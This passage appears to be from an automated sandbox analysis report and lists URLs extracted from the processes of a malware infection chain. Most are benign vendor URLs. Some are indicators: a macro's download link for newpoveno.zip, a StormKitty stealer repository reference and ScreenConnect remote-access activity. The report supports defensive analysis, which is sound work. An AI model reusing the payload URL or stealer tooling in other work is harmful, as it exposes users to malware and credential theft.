                            Source: 7z.exe, 00000005.00000003.1240409197.000002B26CA90000.00000004.00000800.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260717600.000001F346151000.00000004.00001000.00020000.00000000.sdmp, Document.exe, 00000025.00000002.4235454597.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000C7F000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4300058018.000000000594C000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                            Source: 7z.exe, 00000005.00000003.1240409197.000002B26CA90000.00000004.00000800.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260717600.000001F346151000.00000004.00001000.00020000.00000000.sdmp, Document.exe, 00000025.00000002.4235454597.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000C7F000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4300058018.000000000594C000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                            Source: 7z.exe, 00000005.00000003.1240409197.000002B26CA90000.00000004.00000800.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260717600.000001F346151000.00000004.00001000.00020000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000C7F000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4300058018.000000000594C000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                            Source: 7z.exe, 00000005.00000003.1240409197.000002B26CA90000.00000004.00000800.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260717600.000001F346151000.00000004.00001000.00020000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000C7F000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4300058018.000000000594C000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                            Source: svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
                            Source: powershell.exe, 0000000A.00000002.1341746632.00000238CD908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: svchost.exe, 00000003.00000003.1171081299.00000216C3B0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1171098971.00000216C3B0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
                            Source: powershell.exe, 0000000A.00000002.1341746632.00000238CD908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: svchost.exe, 00000003.00000003.3035735932.00000216C3B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3034177266.00000216C3B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                            Source: svchost.exe, 00000003.00000003.3034294653.00000216C3B39000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3034806357.00000216C3B19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3035572254.00000216C3B67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1173067688.00000216C3B66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                            Source: svchost.exe, 00000003.00000003.3034294653.00000216C3B39000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3034806357.00000216C3B19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1173067688.00000216C3B66000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3034053258.00000216C3B65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                            Source: svchost.exe, 00000003.00000003.3034294653.00000216C3B39000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1173067688.00000216C3B66000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3034053258.00000216C3B65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                            Source: svchost.exe, 00000003.00000003.3035572254.00000216C3B67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1173067688.00000216C3B66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issueags
                            Source: svchost.exe, 00000003.00000003.3035572254.00000216C3B67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1173067688.00000216C3B66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                            Source: svchost.exe, 00000003.00000003.3035572254.00000216C3B67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1173067688.00000216C3B66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuem
                            Source: svchost.exe, 00000003.00000003.3034684915.00000216C3B18000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3034806357.00000216C3B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustce
                            Source: newpoveno.exe, 00000008.00000002.1262754832.00007FFA212A1000.00000004.00000001.01000000.00000008.sdmp, newpoveno.exe, 00000016.00000002.1379402287.00007FFA16D21000.00000004.00000001.01000000.0000000E.sdmp, newpoveno.exe, 0000001B.00000002.1458689272.00007FFA212A1000.00000004.00000001.01000000.0000000E.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
                            Source: newpoveno.exe, 00000008.00000002.1262523591.00007FFA2102F000.00000002.00000001.01000000.00000008.sdmp, newpoveno.exe, 00000016.00000002.1379147805.00007FFA16AAF000.00000002.00000001.01000000.0000000E.sdmp, newpoveno.exe, 0000001B.00000002.1458492651.00007FFA2102F000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY
                            Source: newpoveno.exe, 00000008.00000002.1262754832.00007FFA212A1000.00000004.00000001.01000000.00000008.sdmp, newpoveno.exe, 00000008.00000002.1262523591.00007FFA2102F000.00000002.00000001.01000000.00000008.sdmp, powershell.exe, 0000000A.00000002.1341746632.00000238CD6E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.6331801761.0000000003093000.00000004.00000800.00020000.00000000.sdmp, newpoveno.exe, 00000016.00000002.1379402287.00007FFA16D21000.00000004.00000001.01000000.0000000E.sdmp, newpoveno.exe, 00000016.00000002.1379147805.00007FFA16AAF000.00000002.00000001.01000000.0000000E.sdmp, newpoveno.exe, 0000001B.00000002.1458492651.00007FFA2102F000.00000002.00000001.01000000.0000000E.sdmp, newpoveno.exe, 0000001B.00000002.1458689272.00007FFA212A1000.00000004.00000001.01000000.0000000E.sdmp, Document.exe, 00000025.00000002.4235454597.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6335238793.0000000001F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 0000000A.00000002.1341746632.00000238CD908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: rundll32.exe, 00000029.00000003.4239690523.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000029.00000003.4239937892.0000000004B33000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000029.00000003.4239690523.0000000004D3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                            Source: rundll32.exe, 00000029.00000003.4239690523.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000029.00000003.4239937892.0000000004B33000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000029.00000003.4239690523.0000000004D3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wixtoolset.org/news/
                            Source: rundll32.exe, 00000029.00000003.4239690523.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000029.00000003.4239937892.0000000004B33000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000029.00000003.4239690523.0000000004D3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wixtoolset.org/releases/
                            Source: powershell.exe, 0000000A.00000002.1341746632.00000238CD908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: svchost.exe, 0000000D.00000002.1401294501.00000149EBA13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
                            Source: 7z.exe, 00000005.00000003.1240409197.000002B26CA90000.00000004.00000800.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260717600.000001F346151000.00000004.00001000.00020000.00000000.sdmp, Document.exe, 00000025.00000002.4235454597.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000C7F000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4300058018.000000000594C000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                            Source: powershell.exe, 0000000A.00000002.1370202958.00000238E58C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                            Source: powershell.exe, 0000000A.00000002.1377280322.00000238E5D3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                            Source: svchost.exe, 00000003.00000002.3037640058.00000216C4211000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwww3.org/
                            Source: svchost.exe, 00000003.00000002.3037334213.00000216C3309000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135399611.00000216C3B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1127005279.00000216C3B52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                            Source: svchost.exe, 00000003.00000002.3036859939.00000216C322B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                            Source: svchost.exe, 00000003.00000002.3036859939.00000216C322B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135399611.00000216C3B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1127005279.00000216C3B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                            Source: svchost.exe, 00000003.00000002.3037334213.00000216C3309000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135399611.00000216C3B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1127005279.00000216C3B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                            Source: svchost.exe, 00000003.00000002.3037334213.00000216C3309000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135399611.00000216C3B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1127005279.00000216C3B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                            Source: svchost.exe, 00000003.00000003.1135399611.00000216C3B56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1127005279.00000216C3B52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135562377.00000216C3B2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3035735932.00000216C3B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.3034177266.00000216C3B4C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                            Source: svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                            Source: svchost.exe, 00000003.00000003.1128608671.00000216C3B63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036953200.00000216C325F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                            Source: svchost.exe, 00000003.00000003.1128412380.00000216C3B3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3036908435.00000216C3247000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1127005279.00000216C3B52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1135562377.00000216C3B2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128467747.00000216C3B40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1128451284.00000216C3B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
                            Source: newpoveno.exe, 00000008.00000002.1262754832.00007FFA212A1000.00000004.00000001.01000000.00000008.sdmp, newpoveno.exe, 00000008.00000002.1262523591.00007FFA2102F000.00000002.00000001.01000000.00000008.sdmp, newpoveno.exe, 00000016.00000002.1379402287.00007FFA16D21000.00000004.00000001.01000000.0000000E.sdmp, newpoveno.exe, 00000016.00000002.1379147805.00007FFA16AAF000.00000002.00000001.01000000.0000000E.sdmp, newpoveno.exe, 0000001B.00000002.1458492651.00007FFA2102F000.00000002.00000001.01000000.0000000E.sdmp, newpoveno.exe, 0000001B.00000002.1458689272.00007FFA212A1000.00000004.00000001.01000000.0000000E.sdmpString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
                            Source: newpoveno.exe, 00000008.00000002.1262754832.00007FFA212A1000.00000004.00000001.01000000.00000008.sdmp, newpoveno.exe, 00000008.00000002.1261953094.00007FFA20C11000.00000008.00000001.01000000.00000009.sdmp, newpoveno.exe, 00000008.00000002.1262523591.00007FFA2102F000.00000002.00000001.01000000.00000008.sdmp, newpoveno.exe, 00000016.00000002.1379402287.00007FFA16D21000.00000004.00000001.01000000.0000000E.sdmp, newpoveno.exe, 00000016.00000002.1378746242.00007FFA16691000.00000008.00000001.01000000.0000000F.sdmp, newpoveno.exe, 00000016.00000002.1379147805.00007FFA16AAF000.00000002.00000001.01000000.0000000E.sdmp, newpoveno.exe, 0000001B.00000002.1458492651.00007FFA2102F000.00000002.00000001.01000000.0000000E.sdmp, newpoveno.exe, 0000001B.00000002.1458098370.00007FFA202F1000.00000008.00000001.01000000.0000000F.sdmp, newpoveno.exe, 0000001B.00000002.1458689272.00007FFA212A1000.00000004.00000001.01000000.0000000E.sdmpString found in binary or memory: https://aka.ms/dotnet-warnings/
                            Source: newpoveno.exe, 0000001B.00000002.1458689272.00007FFA212A1000.00000004.00000001.01000000.0000000E.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
                            Source: newpoveno.exe, 0000001B.00000002.1458492651.00007FFA2102F000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityY
                            Source: newpoveno.exe, 00000008.00000002.1262523591.00007FFA2102F000.00000002.00000001.01000000.00000008.sdmp, newpoveno.exe, 00000016.00000002.1379147805.00007FFA16AAF000.00000002.00000001.01000000.0000000E.sdmp, newpoveno.exe, 0000001B.00000002.1458492651.00007FFA2102F000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityy
                            Source: powershell.exe, 0000000A.00000002.1341746632.00000238CD6E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: svchost.exe, 0000000D.00000003.1399758657.00000149EBA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                            Source: powershell.exe, 0000000A.00000002.1358130401.00000238DD750000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 0000000A.00000002.1358130401.00000238DD750000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 0000000A.00000002.1358130401.00000238DD750000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: svchost.exe, 0000000D.00000002.1401762798.00000149EBA59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1399758657.00000149EBA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
                            Source: svchost.exe, 0000000D.00000003.1399894906.00000149EBA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1401590212.00000149EBA42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1396778875.00000149EBA64000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1399832739.00000149EBA5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1402037177.00000149EBA65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1402415873.00000149EBA81000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1399758657.00000149EBA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                            Source: svchost.exe, 0000000D.00000002.1402415873.00000149EBA81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                            Source: svchost.exe, 0000000D.00000003.1399758657.00000149EBA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                            Source: svchost.exe, 0000000D.00000003.1396778875.00000149EBA64000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1402037177.00000149EBA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                            Source: svchost.exe, 0000000D.00000002.1402415873.00000149EBA81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                            Source: svchost.exe, 0000000D.00000003.1399758657.00000149EBA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                            Source: svchost.exe, 0000000D.00000002.1401490988.00000149EBA3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1396778875.00000149EBA64000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1399832739.00000149EBA5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1402037177.00000149EBA65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1399758657.00000149EBA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
                            Source: svchost.exe, 0000000D.00000003.1399758657.00000149EBA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                            Source: svchost.exe, 0000000D.00000003.1396778875.00000149EBA64000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1402037177.00000149EBA65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1401427871.00000149EBA2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                            Source: svchost.exe, 0000000D.00000003.1399758657.00000149EBA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                            Source: svchost.exe, 0000000D.00000003.1399758657.00000149EBA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                            Source: svchost.exe, 0000000D.00000003.1399758657.00000149EBA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                            Source: svchost.exe, 0000000D.00000002.1401490988.00000149EBA3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1396778875.00000149EBA64000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1402037177.00000149EBA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                            Source: svchost.exe, 0000000D.00000003.1399894906.00000149EBA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1401590212.00000149EBA42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                            Source: svchost.exe, 0000000D.00000003.1399758657.00000149EBA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                            Source: svchost.exe, 0000000D.00000003.1398961782.00000149EBA60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1401892264.00000149EBA61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                            Source: ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                            Source: svchost.exe, 0000000D.00000003.1399872660.00000149EBA49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                            Source: svchost.exe, 0000000D.00000002.1401590212.00000149EBA42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                            Source: svchost.exe, 0000000D.00000003.1398961782.00000149EBA60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1401892264.00000149EBA61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                            Source: svchost.exe, 0000000D.00000003.1399894906.00000149EBA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.1399739790.00000149EBA5D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1401590212.00000149EBA42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
                            Source: svchost.exe, 0000000D.00000003.1399758657.00000149EBA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                            Source: svchost.exe, 0000000D.00000003.1399758657.00000149EBA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                            Source: svchost.exe, 0000000D.00000003.1396778875.00000149EBA64000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1402037177.00000149EBA65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.1401427871.00000149EBA2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                            Source: vbaProject.binString found in binary or memory: https://f005.backblazeb2.co(m/f
                            Source: vbaProject.binString found in binary or memory: https://f005.backblazeb2.com/file/newuploavir/newpoveno.zip
                            Source: ScreenConnect.WindowsClient.exe, 0000002E.00000002.6366331058.000000001BAB2000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                            Source: svchost.exe, 00000004.00000003.1203610847.000001D22A633000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
                            Source: svchost.exe, 00000004.00000003.1203610847.000001D22A600000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
                            Source: AddInProcess32.exe, 0000000C.00000002.6331801761.000000000357D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKitty
                            Source: AddInProcess32.exe, 0000000C.00000002.6331801761.0000000003093000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKitty0&Or
                            Source: powershell.exe, 0000000A.00000002.1341746632.00000238CD908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: newpoveno.exe, 00000008.00000002.1262523591.00007FFA2102F000.00000002.00000001.01000000.00000008.sdmp, newpoveno.exe, 00000016.00000002.1379147805.00007FFA16AAF000.00000002.00000001.01000000.0000000E.sdmp, newpoveno.exe, 0000001B.00000002.1458492651.00007FFA2102F000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/dotnet/reactive
                            Source: newpoveno.exe, 00000008.00000002.1262523591.00007FFA2102F000.00000002.00000001.01000000.00000008.sdmp, newpoveno.exe, 00000016.00000002.1379147805.00007FFA16AAF000.00000002.00000001.01000000.0000000E.sdmp, newpoveno.exe, 0000001B.00000002.1458492651.00007FFA2102F000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: https://github.com/graphql-dotnet/graphql-client
